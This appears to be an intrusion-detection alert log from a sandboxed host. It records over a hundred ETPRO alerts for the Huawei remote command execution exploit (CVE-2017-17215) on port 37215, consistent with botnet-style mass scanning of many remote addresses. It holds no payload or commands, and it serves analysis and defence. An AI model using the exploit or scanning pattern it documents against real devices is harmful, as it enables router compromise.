                                                        06/13/24-21:33:07.038066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822637215192.168.2.14156.110.136.50
                                                        06/13/24-21:32:03.278981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766037215192.168.2.14197.207.174.181
                                                        06/13/24-21:31:57.092025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952037215192.168.2.14156.150.211.67
                                                        06/13/24-21:32:30.126109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875037215192.168.2.1441.58.5.204
                                                        06/13/24-21:32:56.758278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936037215192.168.2.1441.173.219.110
                                                        06/13/24-21:32:01.223433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406037215192.168.2.14197.6.59.7
                                                        06/13/24-21:32:11.488219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523037215192.168.2.1441.242.207.244
                                                        06/13/24-21:32:36.243806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989837215192.168.2.14197.159.30.154
                                                        06/13/24-21:32:36.243768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323437215192.168.2.14156.189.48.213
                                                        06/13/24-21:32:54.710834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141037215192.168.2.14197.44.207.175
                                                        06/13/24-21:33:04.987800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5715637215192.168.2.14197.127.29.238
                                                        06/13/24-21:32:25.972681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278637215192.168.2.14197.193.23.121
                                                        06/13/24-21:32:58.844232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875437215192.168.2.1441.226.159.204
                                                        06/13/24-21:32:46.509252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.14197.154.249.3
                                                        06/13/24-21:32:19.731701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859637215192.168.2.14156.61.148.14
                                                        06/13/24-21:33:13.214048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4647037215192.168.2.1441.201.47.24
                                                        06/13/24-21:32:09.438684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223437215192.168.2.14197.71.134.134
                                                        06/13/24-21:32:36.266072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036637215192.168.2.14156.166.215.173
                                                        06/13/24-21:32:05.344557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4864237215192.168.2.14197.22.117.8
                                                        06/13/24-21:32:09.457919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4067237215192.168.2.1441.188.81.156
                                                        06/13/24-21:33:00.885827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281037215192.168.2.14156.84.234.156
                                                        06/13/24-21:32:21.781920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4712837215192.168.2.14156.62.131.20
                                                        06/13/24-21:33:13.213356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852237215192.168.2.14197.82.98.231
                                                        06/13/24-21:33:13.230933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3319037215192.168.2.14197.175.227.60
                                                        06/13/24-21:32:07.417775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281637215192.168.2.14156.68.98.131
                                                        06/13/24-21:32:11.485301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600037215192.168.2.1441.59.231.166
                                                        06/13/24-21:32:25.995803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998437215192.168.2.14156.197.6.81
                                                        06/13/24-21:33:17.308028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628037215192.168.2.14197.255.58.67
                                                        06/13/24-21:32:48.573538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713237215192.168.2.1441.131.5.182
                                                        06/13/24-21:31:57.153200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582237215192.168.2.1441.27.151.191
                                                        06/13/24-21:32:38.321213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931037215192.168.2.14197.201.177.143
                                                        06/13/24-21:31:57.133909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309237215192.168.2.14197.2.208.45
                                                        06/13/24-21:32:23.835593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5159037215192.168.2.14156.62.146.217
                                                        06/13/24-21:32:40.357429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542637215192.168.2.1441.15.15.77
                                                        06/13/24-21:32:05.369620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228237215192.168.2.14156.220.120.103
                                                        06/13/24-21:32:25.973996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007637215192.168.2.14156.132.135.182
                                                        06/13/24-21:32:56.785330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325437215192.168.2.14197.85.206.161
                                                        06/13/24-21:32:42.405193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295037215192.168.2.1441.134.205.3
                                                        06/13/24-21:32:42.418944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881037215192.168.2.14156.57.210.126
                                                        06/13/24-21:32:15.609282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673637215192.168.2.14197.143.168.18
                                                        06/13/24-21:32:30.098575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515237215192.168.2.1441.243.196.128
                                                        06/13/24-21:32:54.711008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198837215192.168.2.14197.152.48.55
                                                        06/13/24-21:33:11.175555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6075437215192.168.2.14156.144.26.65
                                                        06/13/24-21:33:15.277222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442437215192.168.2.14156.36.209.12
                                                        06/13/24-21:32:42.423111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5288837215192.168.2.14197.159.26.177
                                                        06/13/24-21:32:01.246155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174037215192.168.2.14197.41.141.210
                                                        06/13/24-21:32:03.299050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722037215192.168.2.1441.178.85.17
                                                        06/13/24-21:32:15.610428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810037215192.168.2.14197.26.133.232
                                                        06/13/24-21:33:04.989071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350037215192.168.2.14156.223.25.200
                                                        06/13/24-21:32:03.278892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600837215192.168.2.14197.39.167.206
                                                        06/13/24-21:32:07.419740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679637215192.168.2.14197.129.247.55
                                                        06/13/24-21:31:57.131054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772037215192.168.2.1441.220.138.129
                                                        06/13/24-21:33:11.157940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663637215192.168.2.1441.61.205.114
                                                        06/13/24-21:32:48.570363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454637215192.168.2.14197.93.145.202
                                                        06/13/24-21:32:05.347368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282637215192.168.2.14197.126.99.254
                                                        06/13/24-21:32:46.502341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121037215192.168.2.1441.1.107.230
                                                        06/13/24-21:32:36.265073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619437215192.168.2.14197.193.219.12
                                                        06/13/24-21:32:56.783269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286637215192.168.2.1441.87.187.242
                                                        06/13/24-21:33:07.057369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818637215192.168.2.14156.116.57.109
                                                        06/13/24-21:32:09.436534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331437215192.168.2.14197.122.60.70
                                                        06/13/24-21:32:15.632280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568637215192.168.2.1441.123.31.202
                                                        06/13/24-21:33:13.211605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5270037215192.168.2.14156.26.43.205
                                                        06/13/24-21:32:46.502471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481637215192.168.2.14156.217.45.31
                                                        06/13/24-21:33:09.130443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5535437215192.168.2.14156.69.213.252
                                                        06/13/24-21:32:42.408100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013037215192.168.2.1441.49.162.63
                                                        06/13/24-21:32:23.830832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869637215192.168.2.1441.137.122.246
                                                        06/13/24-21:32:56.757465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735037215192.168.2.14156.164.43.145
                                                        06/13/24-21:32:38.322708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191837215192.168.2.14197.98.191.199
                                                        06/13/24-21:33:11.155654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760637215192.168.2.1441.255.62.220
                                                        06/13/24-21:32:21.800192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550037215192.168.2.14197.8.88.245
                                                        06/13/24-21:32:11.507197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618837215192.168.2.1441.106.186.75
                                                        06/13/24-21:32:21.802391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5144437215192.168.2.1441.163.49.75
                                                        06/13/24-21:33:04.988653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644837215192.168.2.14156.224.175.247
                                                        06/13/24-21:33:17.309028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051237215192.168.2.1441.239.61.38
                                                        06/13/24-21:33:02.914588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991237215192.168.2.14156.89.48.249
                                                        06/13/24-21:32:25.994539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265837215192.168.2.14156.126.88.162
                                                        06/13/24-21:33:00.885921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441637215192.168.2.1441.217.77.39
                                                        06/13/24-21:32:23.928941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934437215192.168.2.1441.2.189.43
                                                        06/13/24-21:32:07.417237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931437215192.168.2.1441.45.78.43
                                                        06/13/24-21:33:02.914670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993037215192.168.2.1441.223.159.129
                                                        06/13/24-21:33:13.214176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538037215192.168.2.1441.247.68.29
                                                        06/13/24-21:33:07.040496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465237215192.168.2.1441.84.40.124
                                                        06/13/24-21:33:11.177479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282837215192.168.2.14156.27.174.215
                                                        06/13/24-21:31:59.175842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608437215192.168.2.1441.168.245.248
                                                        06/13/24-21:32:03.301155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459837215192.168.2.1441.219.159.105
                                                        06/13/24-21:32:25.969681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354637215192.168.2.1441.13.223.71
                                                        06/13/24-21:32:09.440466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528837215192.168.2.14197.10.171.184
                                                        06/13/24-21:32:30.125028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061037215192.168.2.14156.184.32.129
                                                        06/13/24-21:32:46.525949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361837215192.168.2.1441.202.63.196
                                                        06/13/24-21:32:54.727230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226037215192.168.2.14156.110.191.147
                                                        06/13/24-21:31:57.094109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738237215192.168.2.1441.165.241.236
                                                        06/13/24-21:32:30.094926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291437215192.168.2.14156.199.43.113
                                                        06/13/24-21:32:38.318019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601637215192.168.2.1441.54.73.216
                                                        06/13/24-21:33:17.308114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988437215192.168.2.1441.94.173.229
                                                        06/13/24-21:32:03.299400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481437215192.168.2.14197.152.83.80
                                                        06/13/24-21:33:11.158825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978037215192.168.2.14197.79.180.182
                                                        06/13/24-21:32:23.830999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329037215192.168.2.1441.135.167.81
                                                        06/13/24-21:32:23.931714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358237215192.168.2.14197.74.148.195
                                                        06/13/24-21:32:38.300164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574837215192.168.2.1441.23.158.209
                                                        06/13/24-21:33:15.253144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981237215192.168.2.14197.206.103.226
                                                        06/13/24-21:33:04.991821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124837215192.168.2.14197.250.101.23
                                                        06/13/24-21:33:09.108238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577637215192.168.2.14197.237.167.31
                                                        06/13/24-21:31:59.175535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912237215192.168.2.1441.0.221.87
                                                        06/13/24-21:32:01.241561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545037215192.168.2.1441.202.133.43
                                                        06/13/24-21:33:15.272899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3294237215192.168.2.1441.223.170.86
                                                        06/13/24-21:32:28.026608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969237215192.168.2.14197.157.60.57
                                                        06/13/24-21:32:36.264258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355437215192.168.2.14197.91.145.135
                                                        06/13/24-21:32:38.305415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865837215192.168.2.1441.65.129.202
                                                        06/13/24-21:32:50.615718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490437215192.168.2.14156.247.232.41
                                                        06/13/24-21:32:54.708758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223037215192.168.2.14197.92.145.195
                                                        06/13/24-21:33:05.010973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446237215192.168.2.14197.203.188.202
                                                        06/13/24-21:33:13.231502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373037215192.168.2.14197.253.3.121
                                                        06/13/24-21:32:03.279099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462437215192.168.2.14156.22.15.149
                                                        06/13/24-21:33:17.306204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503837215192.168.2.14197.162.136.70
                                                        06/13/24-21:32:09.452970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289237215192.168.2.14156.186.4.132
                                                        06/13/24-21:32:07.400798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326837215192.168.2.1441.249.17.89
                                                        06/13/24-21:33:07.039261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507037215192.168.2.1441.232.5.103
                                                        06/13/24-21:31:57.132450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057237215192.168.2.1441.117.10.40
                                                        06/13/24-21:32:09.452994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285637215192.168.2.14156.193.162.34
                                                        06/13/24-21:32:58.842646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5641837215192.168.2.1441.95.26.89
                                                        06/13/24-21:32:32.171336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947837215192.168.2.14156.98.182.164
                                                        06/13/24-21:32:36.243586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458037215192.168.2.14197.95.19.53
                                                        06/13/24-21:32:40.359338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350237215192.168.2.14156.5.185.183
                                                        06/13/24-21:32:56.789390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664637215192.168.2.14197.153.214.197
                                                        06/13/24-21:33:11.159254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319837215192.168.2.14156.225.247.175
                                                        06/13/24-21:32:09.439794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892237215192.168.2.14156.109.89.41
                                                        06/13/24-21:32:30.075354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369837215192.168.2.14156.252.10.188
                                                        06/13/24-21:32:56.757649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057637215192.168.2.1441.150.4.71
                                                        06/13/24-21:32:34.212945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627837215192.168.2.1441.239.138.77
                                                        06/13/24-21:32:19.750800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446837215192.168.2.14156.63.67.245
                                                        06/13/24-21:32:44.480373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969637215192.168.2.14197.186.224.173
                                                        06/13/24-21:33:04.994076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012837215192.168.2.14156.202.231.61
                                                        06/13/24-21:33:15.276662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443037215192.168.2.14156.241.220.32
                                                        06/13/24-21:33:05.011176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820237215192.168.2.1441.197.245.3
                                                        06/13/24-21:32:50.633218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923837215192.168.2.1441.125.233.172
                                                        06/13/24-21:32:52.655786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939837215192.168.2.14156.153.75.59
                                                        06/13/24-21:31:57.137685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246437215192.168.2.1441.218.55.199
                                                        06/13/24-21:32:13.569599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622437215192.168.2.1441.197.233.38
                                                        06/13/24-21:32:36.265320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298837215192.168.2.1441.51.90.95
                                                        06/13/24-21:32:42.406629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5873237215192.168.2.1441.171.178.125
                                                        06/13/24-21:32:23.831615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.14197.85.70.100
                                                        06/13/24-21:32:17.673999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834437215192.168.2.1441.4.193.65
                                                        06/13/24-21:33:04.989291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038437215192.168.2.14156.145.127.206
                                                        06/13/24-21:32:13.547224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023037215192.168.2.1441.234.230.196
                                                        06/13/24-21:32:15.610681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722037215192.168.2.14156.13.57.104
                                                        06/13/24-21:32:30.074714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527037215192.168.2.1441.230.137.41
                                                        06/13/24-21:32:32.154518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397637215192.168.2.1441.107.80.243
                                                        06/13/24-21:32:46.503025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182237215192.168.2.1441.39.237.38
                                                        06/13/24-21:32:03.307199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835837215192.168.2.14197.139.198.159
                                                        06/13/24-21:33:05.012739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288237215192.168.2.14156.92.226.219
                                                        06/13/24-21:32:46.508350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655237215192.168.2.14156.169.153.140
                                                        06/13/24-21:32:46.509330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265837215192.168.2.14197.50.5.196
                                                        06/13/24-21:32:46.510279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720037215192.168.2.1441.225.241.170
                                                        06/13/24-21:32:58.822214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516037215192.168.2.1441.253.97.199
                                                        06/13/24-21:33:13.214402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282437215192.168.2.1441.234.36.79
                                                        06/13/24-21:32:32.154332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4014637215192.168.2.1441.30.159.244
                                                        06/13/24-21:32:46.523873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085437215192.168.2.1441.236.154.230
                                                        06/13/24-21:32:25.991779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5293637215192.168.2.1441.185.48.195
                                                        06/13/24-21:33:02.913710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669037215192.168.2.14156.175.164.52
                                                        06/13/24-21:33:13.228184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862237215192.168.2.14156.14.104.130
                                                        06/13/24-21:32:17.674545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390837215192.168.2.14156.181.50.140
                                                        06/13/24-21:32:21.782752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649837215192.168.2.14156.88.129.12
                                                        06/13/24-21:32:03.278626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028237215192.168.2.1441.116.69.21
                                                        06/13/24-21:31:57.092329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997837215192.168.2.14197.190.253.88
                                                        06/13/24-21:32:03.276684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561837215192.168.2.14197.212.192.227
                                                        06/13/24-21:32:44.478385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822237215192.168.2.1441.120.207.96
                                                        06/13/24-21:32:11.509544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990637215192.168.2.1441.244.236.101
                                                        06/13/24-21:32:44.475195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060837215192.168.2.1441.194.102.205
                                                        06/13/24-21:32:52.670205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589837215192.168.2.14156.170.250.242
                                                        06/13/24-21:32:23.942572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174437215192.168.2.14156.195.133.128
                                                        06/13/24-21:32:28.028773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878237215192.168.2.1441.194.65.120
                                                        06/13/24-21:32:36.247148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754237215192.168.2.14156.228.38.219
                                                        06/13/24-21:33:04.989586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814237215192.168.2.14156.23.28.12
                                                        06/13/24-21:32:17.697027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572437215192.168.2.1441.17.114.141
                                                        06/13/24-21:32:54.707331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313237215192.168.2.14197.76.129.125
                                                        06/13/24-21:32:28.026943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103037215192.168.2.14156.181.144.60
                                                        06/13/24-21:32:13.546659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672237215192.168.2.14156.213.43.151
                                                        06/13/24-21:32:11.486976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194437215192.168.2.14197.102.29.42
                                                        06/13/24-21:32:56.755597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845837215192.168.2.14197.121.197.95
                                                        06/13/24-21:32:30.097507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903037215192.168.2.14156.155.196.96
                                                        06/13/24-21:33:17.307392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084237215192.168.2.14197.224.18.154
                                                        06/13/24-21:32:01.221544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524837215192.168.2.14156.78.197.236
                                                        06/13/24-21:32:05.349188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300437215192.168.2.1441.98.25.241
                                                        06/13/24-21:32:17.675208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976837215192.168.2.1441.221.127.180
                                                        06/13/24-21:32:30.123925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604837215192.168.2.1441.46.95.168
                                                        06/13/24-21:32:05.345146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628837215192.168.2.14156.111.229.77
